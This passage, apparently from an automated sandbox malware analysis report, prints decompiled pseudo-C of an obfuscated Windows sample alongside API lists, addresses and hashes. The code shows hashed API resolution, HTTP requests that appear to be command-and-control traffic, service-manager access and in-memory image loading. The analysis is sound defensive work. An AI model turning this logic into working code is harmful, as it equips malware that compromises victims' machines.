							__eflags = _t36;
							 *(_t148 + 0x1c) = _t36;
							_t137 =  !=  ? 0x2a5ea3fb : 0xe955358;
							_t38 =  *0x234dea8;
							__eflags = _t38;
							if(_t38 == 0) {
								_t38 = E02343E80(_t84, E02343F20(0xbb398380), 0x97f883e, _t147);
								 *0x234dea8 = _t38;
							}
							_t134 =  *_t38();
							_t40 =  *0x234e1a0;
							__eflags = _t40;
							if(_t40 == 0) {
								_t40 = E02343E80(_t84, E02343F20(0xbb398380), 0x26c3f343, _t147);
								 *0x234e1a0 = _t40;
							}
							 *_t40(_t134, 0,  *(_t148 + 0x14));
							goto L34;
						} else {
							_t152 = _t137 - 0x67ae942;
							if(_t152 > 0) {
								__eflags = _t137 - 0x6b479f3;
								if(_t137 == 0x6b479f3) {
									__eflags =  *0x234e128;
									if( *0x234e128 == 0) {
										 *0x234e128 = E02343E80(_t84, E02343F20(0x2ba535f4), 0x6972c784, _t147);
									}
									InternetCloseHandle(_t84); // executed
									_t137 = 0x12dff647;
									continue;
								} else {
									__eflags = _t137 - 0x8581448;
									if(_t137 != 0x8581448) {
										goto L34;
									} else {
										__eflags = _t147;
										if(_t147 == 0) {
											_t141 =  *(_t148 + 0x20);
										} else {
											_t141 = E023434C0(0x234d1f0);
											 *(_t148 + 0x20) = _t141;
										}
										__eflags =  *0x234e1cc;
										if( *0x234e1cc == 0) {
											 *0x234e1cc = E02343E80(_t84, E02343F20(0x2ba535f4), 0xc136cec1, _t147);
										}
										_t53 = HttpOpenRequestW(_t133, _t141,  *(_t148 + 0x50), 0, 0, 0, 0x844cc300, 0); // executed
										_t84 = _t53;
										E02343460(_t141);
										__eflags = _t84;
										_t137 =  !=  ? 0x4e6dd92 : 0x12dff647;
										continue;
									}
								}
							} else {
								if(_t152 == 0) {
									__eflags = E023429B0(_t84,  *((intOrPtr*)(_t148 + 0x48)));
									_t88 =  !=  ? 1 :  *(_t148 + 0x10);
									__eflags = _t88;
									 *(_t148 + 0x10) = _t88;
									L15:
									_t137 = 0x6b479f3;
									continue;
								} else {
									if(_t137 == 0x1e6c40f) {
										_t47 =  *0x234e128;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E02343E80(_t84, E02343F20(0x2ba535f4), 0x6972c784, _t147);
											 *0x234e128 = _t47;
										}
										 *_t47( *(_t148 + 0x1c));
									} else {
										if(_t137 != 0x4e6dd92) {
											L34:
											__eflags = _t137 - 0xe955358;
											if(_t137 != 0xe955358) {
												goto L1;
											}
										} else {
											if(_t147 == 0) {
												_t143 = 0;
												_t136 = 0;
												__eflags = 0;
											} else {
												_t143 =  *(_t147 + 4);
												_t136 =  *_t147;
											}
											if( *0x234e20c == 0) {
												 *0x234e20c = E02343E80(_t84, E02343F20(0x2ba535f4), 0x182fe063, _t147);
											}
											_t51 = HttpSendRequestW(_t84,  *(_t148 + 0x4c), 0xffffffff, _t136, _t143); // executed
											asm("sbb esi, esi");
											_t137 = ( ~_t51 & 0x1a4d9a07) + 0x6b479f3;
											while(1) {
												L1:
												_t133 =  *(_t148 + 0x18);
												while(1) {
													L2:
													_t151 = _t137 - 0xdefb712;
													if(_t151 > 0) {
														goto L36;
													}
													goto L3;
												}
												goto L36;
											}
										}
									}
								}
							}
						}
						L64:
						return  *(_t148 + 0x10);
						L65:
						L36:
						__eflags = _t137 - 0x210213fa;
						if(__eflags > 0) {
							__eflags = _t137 - 0x21ed7693;
							if(_t137 == 0x21ed7693) {
								_t137 = 0x1e47f06d;
								continue;
							} else {
								__eflags = _t137 - 0x2a5ea3fb;
								if(_t137 != 0x2a5ea3fb) {
									goto L34;
								} else {
									__eflags =  *0x234e178;
									if( *0x234e178 == 0) {
										 *0x234e178 = E02343E80(_t84, E02343F20(0x2ba535f4), 0x48c489b5, _t147);
									}
									_t58 = InternetConnectW( *(_t148 + 0x38),  *(_t148 + 0x4c),  *(_t148 + 0x44), 0, 0, 3, 0, 0); // executed
									_t133 = _t58;
									__eflags = _t133;
									 *(_t148 + 0x18) = _t133;
									_t137 =  !=  ? 0x8581448 : 0x1e6c40f;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t60 =  *0x234dde8; // 0x0
								 *((intOrPtr*)(_t148 + 0x28)) = 4;
								__eflags = _t60;
								if(_t60 == 0) {
									_t60 = E02343E80(_t84, E02343F20(0x2ba535f4), 0x46124712, _t147);
									 *0x234dde8 = _t60;
								}
								_t61 =  *_t60(_t84, 0x20000013, _t148 + 0x34, _t148 + 0x2c, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L15;
								} else {
									__eflags =  *((intOrPtr*)(_t148 + 0x2c)) - 0xc8;
									if( *((intOrPtr*)(_t148 + 0x2c)) != 0xc8) {
										goto L15;
									} else {
										_t137 = 0x67ae942;
										continue;
									}
								}
								goto L65;
							} else {
								__eflags = _t137 - 0x12dff647;
								if(_t137 == 0x12dff647) {
									_t62 =  *0x234e128;
									__eflags = _t62;
									if(_t62 == 0) {
										_t62 = E02343E80(_t84, E02343F20(0x2ba535f4), 0x6972c784, _t147);
										 *0x234e128 = _t62;
									}
									 *_t62(_t133);
									_t137 = 0x1e6c40f;
									continue;
								} else {
									__eflags = _t137 - 0x1e47f06d;
									if(_t137 != 0x1e47f06d) {
										goto L34;
									} else {
										 *(_t148 + 0x24) = 0x200;
										_t139 = E023442F0(_t84, 0x200);
										__eflags = _t139;
										if(_t139 != 0) {
											_t65 =  *0x234dbf0;
											__eflags = _t65;
											if(_t65 == 0) {
												_t65 = E02343E80(_t84, E02343F20(0x50c9f0c1), 0xd16bf1bd, _t147);
												 *0x234dbf0 = _t65;
											}
											_t66 =  *_t65(0, _t139, _t148 + 0x24); // executed
											__eflags = _t66;
											if(_t66 == 0) {
												_t68 = E023456A0(_t139, _t147);
												_t148 = _t148 - 8 + 8;
												 *(_t148 + 0x14) = _t68;
											}
											E02344250(_t84, _t139);
										}
										_t137 = 0xdefb712;
										continue;
									}
								}
							}
						}
						goto L64;
					}
				}
			}

0x02342c25
0x02342c2c
0x02342c30
0x02342c35
0x02342c3a
0x02342c3e
0x02342c46
0x02342c4e
0x02342c56
0x02342c5a
0x02342c5a
0x02342c5a
0x02342c60
0x02342c60
0x02342c60
0x02342c66
0x00000000
0x00000000
0x02342c6c
0x02342c6c
0x02342dcf
0x02342dd1
0x02342de9
0x02342de9
0x02342dfa
0x02342dfc
0x02342dfe
0x02342e0c
0x02342e0f
0x02342e14
0x02342e16
0x02342e29
0x02342e2e
0x02342e2e
0x02342e35
0x02342e37
0x02342e3c
0x02342e3e
0x02342e51
0x02342e56
0x02342e56
0x02342e62
0x00000000
0x02342c72
0x02342c72
0x02342c78
0x02342d15
0x02342d1b
0x02342d9e
0x02342da0
0x02342db8
0x02342db8
0x02342dbe
0x02342dc0
0x00000000
0x02342d1d
0x02342d1d
0x02342d23
0x00000000
0x02342d29
0x02342d29
0x02342d2b
0x02342d3f
0x02342d2d
0x02342d37
0x02342d39
0x02342d39
0x02342d48
0x02342d4a
0x02342d62
0x02342d62
0x02342d7a
0x02342d7e
0x02342d80
0x02342d85
0x02342d91
0x00000000
0x02342d91
0x02342d23
0x02342c7e
0x02342c7e
0x02342cfd
0x02342d04
0x02342d04
0x02342d07
0x02342d0b
0x02342d0b
0x00000000
0x02342c80
0x02342c86
0x02343008
0x0234300d
0x0234300f
0x02343022
0x02343027
0x02343027
0x02343030
0x02342c8c
0x02342c92
0x02342e64
0x02342e64
0x02342e6a
0x00000000
0x02342e70
0x02342c98
0x02342c9a
0x02342ca4
0x02342ca6
0x02342ca6
0x02342c9c
0x02342c9c
0x02342c9f
0x02342c9f
0x02342caf
0x02342cc7
0x02342cc7
0x02342cd5
0x02342cdb
0x02342ce3
0x02342c5a
0x02342c5a
0x02342c5a
0x02342c60
0x02342c60
0x02342c60
0x02342c66
0x00000000
0x00000000
0x00000000
0x02342c66
0x00000000
0x02342c60
0x02342c5a
0x02342c92
0x02342c86
0x02342c7e
0x02342c78
0x02343032
0x0234303d
0x00000000
0x02342e75
0x02342e75
0x02342e7b
0x02342f94
0x02342f9a
0x02342ffe
0x00000000
0x02342f9c
0x02342f9c
0x02342fa2
0x00000000
0x02342fa8
0x02342fad
0x02342faf
0x02342fc7
0x02342fc7
0x02342fe2
0x02342fe4
0x02342feb
0x02342fed
0x02342ff6
0x00000000
0x02342ff6
0x02342fa2
0x02342e81
0x02342e81
0x02342f34
0x02342f39
0x02342f41
0x02342f43
0x02342f56
0x02342f5b
0x02342f5b
0x02342f72
0x02342f74
0x02342f76
0x00000000
0x02342f7c
0x02342f7c
0x02342f84
0x00000000
0x02342f8a
0x02342f8a
0x00000000
0x02342f8a
0x02342f84
0x00000000
0x02342e87
0x02342e87
0x02342e8d
0x02342f03
0x02342f08
0x02342f0a
0x02342f1d
0x02342f22
0x02342f22
0x02342f28
0x02342f2a
0x00000000
0x02342e8f
0x02342e8f
0x02342e95
0x00000000
0x02342e97
0x02342e9c
0x02342ea9
0x02342eab
0x02342ead
0x02342eaf
0x02342eb4
0x02342eb6
0x02342ec9
0x02342ece
0x02342ece
0x02342edb
0x02342edd
0x02342edf
0x02342ee6
0x02342eeb
0x02342eee
0x02342eee
0x02342ef4
0x02342ef4
0x02342ef9
0x00000000
0x02342ef9
0x02342e95
0x02342e8d
0x02342e81
0x00000000
0x02342e7b
0x02342c60

APIs

HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 02342CD5
HttpOpenRequestW.WININET(?,00000000,?,00000000,00000000,00000000,844CC300,00000000), ref: 02342D7A
InternetCloseHandle.WININET(?), ref: 02342DBE
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02342DFA
ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 02342EDB
InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02342FE2

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$AgentCloseConnectHandleObtainSendStringUser
String ID:
API String ID: 2868826471-0
Opcode ID: 622602a027f83a26adea3db99704fd154a5dd61b1e1a5b92acf3666310ee7e74
Instruction ID: 20af0a255d4a7da646e8d3cc348da414e134777217b0a92f66272cfcabcac612
Opcode Fuzzy Hash: 622602a027f83a26adea3db99704fd154a5dd61b1e1a5b92acf3666310ee7e74
Instruction Fuzzy Hash: 8BA1C0B6E453019BDB24AB648C8072B76EAAB84B44F1009E9FD55EB350DF30BD418BD2

Uniqueness

Uniqueness Score: -1.00%

Function 022E0990, Relevance: 9.1, APIs: 6, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 022E0B88
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 022E0BBA
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 022E0BFB

VirtualAlloc.KERNEL32(?,?,00000000), ref: 022E09E6
RtlMoveMemory.NTDLL(00000000,?,?), ref: 022E09F5

Part of subcall function 022E0D00: lstrcpynW.KERNEL32(?,00000000,00000000,00000010,022E0B7D,00000000), ref: 022E0D15

RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 022E0A26
VirtualAlloc.KERNEL32(?,?,00000000), ref: 022E0A41
RtlMoveMemory.NTDLL(00000000,?,?), ref: 022E0A6E
RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 022E0A8B

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: Memory$Move$AllocVirtual$Filllstrcpyn
String ID:
API String ID: 3581289920-0
Opcode ID: 449b69f8a763e67152e7b53cd49144c3446f3476cce69b159e67f55379084994
Instruction ID: 1c886235fa780d27ce1602820ec5790be86981febb22c9fbf6e6b858c2a17916
Opcode Fuzzy Hash: 449b69f8a763e67152e7b53cd49144c3446f3476cce69b159e67f55379084994
Instruction Fuzzy Hash: D7316F71618304AFDB64DBA4C840F6F73EAEBC8704F50491CB549E7244D6B4EA0ACBA6

Uniqueness

Uniqueness Score: -1.00%

Function 023496B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E023496B0() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* _t44;
				void* _t47;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t61;
				void* _t62;
				void* _t66;
				void* _t69;
				intOrPtr _t71;
				void* _t73;
				intOrPtr _t79;
				void* _t87;
				void* _t90;
				signed int _t103;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;

				_t117 = _v528;
				_t44 = 0x290b7473;
				_t116 = 0;
				_t2 = _t116 + 1; // 0x1
				_t79 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t121 = _t44 - 0x185037e0;
						if(_t121 > 0) {
							break;
						}
						if(_t121 == 0) {
							_v528 = 0x9fb;
							_v528 = _v528 ^ 0xe4a1a680;
							_v528 = _v528 << 0xd;
							_v528 = _v528 + 0xffffacfd;
							_t80 = _v528;
							_t44 = 0xac9ce62;
							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
							_v528 = _v528 << 5;
							_v528 = _v528 ^ 0x3febe949;
							continue;
						} else {
							_t122 = _t44 - 0xac9ce62;
							if(_t122 > 0) {
								__eflags = _t44 - 0x143d843a;
								if(_t44 != 0x143d843a) {
									goto L32;
								} else {
									E02347AB0(_t118);
									_t44 = 0x28458a2;
									continue;
								}
							} else {
								if(_t122 == 0) {
									_t66 =  *0x234ddb8;
									__eflags = _t66;
									if(_t66 == 0) {
										_t66 = E02343E80(_t79, E02343F20(0x667fdee), 0x505cb3fe, _t118);
										 *0x234ddb8 = _t66;
									}
									 *_t66(_t117);
									_t44 = 0x67ba340;
									continue;
								} else {
									if(_t44 == 0x28458a2) {
										_t69 =  *0x234de58;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E02343E80(_t79, E02343F20(0xbb398380), 0xb1aefb5, _t118);
											 *0x234de58 = _t69;
										}
										 *_t69(0,  &_v524, 0x104);
										_t71 = E02343D10( &_v536);
										_t87 =  *0x234e2ec; // 0x78e578
										 *((intOrPtr*)(_t87 + 0x48)) = _t71;
										_t44 = 0x311c267c;
										continue;
									} else {
										if(_t44 != 0x67ba340) {
											goto L32;
										} else {
											_t90 =  *0x234df38; // 0x75243620
											if(_t90 == 0) {
												_t90 = E02343E80(_t79, E02343F20(0xf9c30097), 0x62c574d8, _t118);
												 *0x234df38 = _t90;
											}
											_t73 =  *0x234e2ec; // 0x78e578
											 *_t90(0, _v528, 0, 0, _t73 + 0x5c); // executed
											_t44 = 0x143d843a;
											_t116 =  ==  ? _t79 : _t116;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					__eflags = _t44 - 0x311c267c;
					if(__eflags > 0) {
						__eflags = _t44 - 0x37104f21;
						if(_t44 != 0x37104f21) {
							goto L32;
						} else {
							__eflags =  *0x234e0f4;
							if( *0x234e0f4 == 0) {
								 *0x234e0f4 = E02343E80(_t79, E02343F20(0x667fdee), 0x7f692adf, _t118);
							}
							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t117 = _t47;
							__eflags = _t117;
							if(_t117 == 0) {
								_t44 = 0x25965b99;
							} else {
								_t48 =  *0x234e2ec; // 0x78e578
								 *((intOrPtr*)(_t48 + 0x268)) = _t79;
								_t44 = 0x185037e0;
							}
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 =  *0x234df38;
							__eflags = _t51;
							if(_t51 == 0) {
								_t51 = E02343E80(_t79, E02343F20(0xf9c30097), 0x62c574d8, _t118);
								 *0x234df38 = _t51;
							}
							 *_t51(0, 0x25, 0, 0,  &_v524);
							_t53 =  *0x234e2ec; // 0x78e578
							__eflags = _t53 + 0x10;
							E02343070(_t53 + 0x10);
							goto L37;
						} else {
							__eflags = _t44 - 0x25965b99;
							if(_t44 == 0x25965b99) {
								_v528 = 0x4b7f;
								_v528 = _v528 + 0xffffece0;
								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
								_v528 = _t103;
								_v528 = (_t103 << 5) + _v528;
								_v528 = _v528 >> 2;
								_v528 = _v528 ^ 0x000008d8;
								_t61 =  *0x234e2ec; // 0x78e578
								 *((intOrPtr*)(_t61 + 0x3c)) = 0x2347c60;
								_t44 = 0x67ba340;
								goto L1;
							} else {
								__eflags = _t44 - 0x290b7473;
								if(_t44 != 0x290b7473) {
									goto L32;
								} else {
									_t62 = E023442F0(_t79, 0x480);
									 *0x234e2ec = _t62;
									__eflags = _t62;
									if(_t62 == 0) {
										L37:
										return _t116;
									} else {
										 *((intOrPtr*)(_t62 + 0x38)) = E02347C70;
										_t44 = 0x37104f21;
										goto L1;
									}
								}
							}
						}
					}
					goto L38;
					L32:
					__eflags = _t44 - 0x20400186;
				} while (_t44 != 0x20400186);
				return _t116;
				goto L38;
			}

0x023496b8
0x023496bc
0x023496c2
0x023496c4
0x023496c4
0x023496c7
0x023496d0
0x023496d0
0x023496d0
0x023496d0
0x023496d5
0x00000000
0x00000000
0x023496db
0x023497e7
0x023497f4
0x023497fc
0x02349801
0x02349809
0x0234980f
0x0234981d
0x02349821
0x02349826
0x00000000
0x023496e1
0x023496e1
0x023496e6
0x023497cd
0x023497d2
0x00000000
0x023497d8
0x023497d8
0x023497dd
0x00000000
0x023497dd
0x023496ec
0x023496ec
0x0234979c
0x023497a1
0x023497a3
0x023497b6
0x023497bb
0x023497bb
0x023497c1
0x023497c3
0x00000000
0x023496f2
0x023496f7
0x0234974e
0x02349753
0x02349755
0x02349768
0x0234976d
0x0234976d
0x0234977e
0x02349784
0x02349789
0x0234978f
0x02349792
0x00000000
0x023496f9
0x023496fe
0x00000000
0x02349704
0x02349704
0x0234970c
0x02349724
0x02349726
0x02349726
0x0234972c
0x02349740
0x02349744
0x02349749
0x00000000
0x02349749
0x023496fe
0x023496f7
0x023496ec
0x023496e6
0x00000000
0x023496db
0x02349833
0x02349838
0x023498d6
0x023498db
0x00000000
0x023498dd
0x023498e2
0x023498e4
0x023498fc
0x023498fc
0x0234990a
0x0234990c
0x0234990e
0x02349910
0x02349927
0x02349912
0x02349912
0x02349917
0x0234991d
0x0234991d
0x00000000
0x02349910
0x0234983e
0x0234983e
0x02349948
0x0234994d
0x0234994f
0x02349962
0x02349967
0x02349967
0x02349979
0x0234997b
0x02349984
0x02349988
0x00000000
0x02349844
0x02349844
0x02349849
0x0234987e
0x0234988b
0x0234989f
0x023498a2
0x023498af
0x023498b3
0x023498b8
0x023498c0
0x023498c5
0x023498cc
0x00000000
0x0234984b
0x0234984b
0x02349850
0x00000000
0x02349856
0x0234985b
0x02349860
0x02349865
0x02349867
0x02349990
0x0234999b
0x0234986d
0x0234986d
0x02349874
0x00000000
0x02349874
0x02349867
0x02349850
0x02349849
0x0234983e
0x00000000
0x02349931
0x02349931
0x02349931
0x02349947
0x00000000

APIs

OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,2564BE4F), ref: 0234990A

Strings

6$u, xrefs: 02349704, 02349726, 02349967
xx, xrefs: 0234972C, 02349789, 02349860, 023498C0, 02349912, 0234997B
I?, xrefs: 02349826

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: 6$u$I?$xx
API String ID: 1889721586-3615715878
Opcode ID: 48445bb171e90aff56af6b5e0b22e82ef5b116eea1b26936c2617a86bed4c171
Instruction ID: 0ea707b1422f74fdd19a3cf946d75db80246acc94b3287ae3eca6b3196e22b81
Opcode Fuzzy Hash: 48445bb171e90aff56af6b5e0b22e82ef5b116eea1b26936c2617a86bed4c171
Instruction Fuzzy Hash: 9E61E2B57043009BC7289E689495B2B37E9AB84714F5089EEE956DB390DF38F804CF82

Uniqueness

Uniqueness Score: -1.00%

Function 023430D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E023430D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x234ddd0;
									if(_t85 == 0) {
										_t85 = E02343E80(_t76, E02343F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x234ddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x234e25c;
								if(_t90 == 0) {
									_t90 = E02343E80(_t76, E02343F20(0xbb398380), 0x5b27858b, _t102);
									 *0x234e25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x234dea8;
									if(_t68 == 0) {
										_t68 = E02343E80(_t76, E02343F20(0xbb398380), 0x97f883e, _t102);
										 *0x234dea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x234dcec == 0) {
										 *0x234dcec = E02343E80(_t76, E02343F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E02343D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x023430d2
0x023430d6
0x023430dc
0x023430e1
0x023430e6
0x023430ea
0x023430ea
0x023430f0
0x023430f0
0x023430f0
0x023430f0
0x023430f5
0x00000000
0x00000000
0x023431b1
0x02343226
0x0234322e
0x02343233
0x0234323b
0x02343240
0x02343248
0x0234324d
0x02343255
0x0234325a
0x02343262
0x0234326a
0x0234326f
0x0234327c
0x02343280
0x02343285
0x0234328d
0x02343292
0x0234329f
0x023432a3
0x023432a8
0x00000000
0x023431b3
0x023431b8
0x023431ec
0x023431f4
0x0234320c
0x0234320e
0x0234320e
0x0234321a
0x0234321c
0x023430ea
0x023430ea
0x00000000
0x023430ea
0x023431ba
0x023431bf
0x00000000
0x023431c1
0x023431cc
0x00000000
0x023431cc
0x023431bf
0x023431b8
0x00000000
0x023431b1
0x023430fb
0x0234319c
0x00000000
0x023431a2
0x023431a2
0x00000000
0x023431a2
0x02343101
0x02343106
0x023432b5
0x023432bd
0x023432d5
0x023432d7
0x023432d7
0x023432ee
0x023432f0
0x023432f7
0x023432fd
0x02343300
0x00000000
0x0234310c
0x02343111
0x0234312e
0x02343135
0x02343148
0x0234314d
0x0234314d
0x02343154
0x0234315d
0x02343175
0x02343175
0x02343182
0x02343184
0x02343188
0x02343306
0x0234330d
0x0234318e
0x0234318e
0x00000000
0x0234318e
0x02343113
0x02343118
0x00000000
0x0234311e
0x02343125
0x02343127
0x023430ea
0x023430ea
0x00000000
0x023430ea
0x023430ea
0x02343118
0x02343111
0x02343106
0x00000000
0x023431d4
0x023431d4
0x023431e9
0x00000000
0x023431e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02343182

Strings

S=, xrefs: 02343226
&, xrefs: 0234328D
B, xrefs: 02343262

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: 5b5716425d856eab0be66b35b3e179246a4a8a0c9b9eceec77b196d872730cf9
Instruction ID: 55cca648a8b44d6b617784c9c722c0339cc62bdccbaea1228c859d6a1b4fb8c5
Opcode Fuzzy Hash: 5b5716425d856eab0be66b35b3e179246a4a8a0c9b9eceec77b196d872730cf9
Instruction Fuzzy Hash: 0651D376A093029BCB28DE28948452BB7E6FBD4754F3049DEE446C7210DF70FA468BD2

Uniqueness

Uniqueness Score: -1.00%

Function 02349C10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E02349C10(void* __ebp) {
				char _v520;
				char _v1040;
				char _v1044;
				void* __ebx;
				void* _t7;
				intOrPtr* _t9;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;

				_t45 = __ebp;
				_t7 = 0x2c176d24;
				goto L1;
				do {
					while(1) {
						L1:
						_t48 = _t7 - 0x2c176d24;
						if(_t48 > 0) {
							break;
						}
						if(_t48 == 0) {
							_t7 = 0x2ca09120;
							continue;
						} else {
							if(_t7 == 0x17e35087) {
								_v1044 = 0x104;
								if( *0x234ded0 == 0) {
									 *0x234ded0 = E02343E80(0, E02343F20(0xbb398380), 0x23563937, _t45);
								}
								_t42 =  *0x234df2c;
								if(_t42 == 0) {
									_t42 = E02343E80(0, E02343F20(0xbb398380), 0xd0ee7032, _t45);
									 *0x234df2c = _t42;
								}
								 *_t42(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
								_t7 = 0x2c13ef60;
								continue;
							} else {
								if(_t7 == 0x2c13ef60) {
									_t20 =  *0x234dd80;
									if(_t20 == 0) {
										_t20 = E02343E80(0, E02343F20(0xbb398380), 0xcb2f8494, _t45);
										 *0x234dd80 = _t20;
									}
									 *_t20( &_v520,  &_v1040);
									_t25 =  !=  ? 1 : 0;
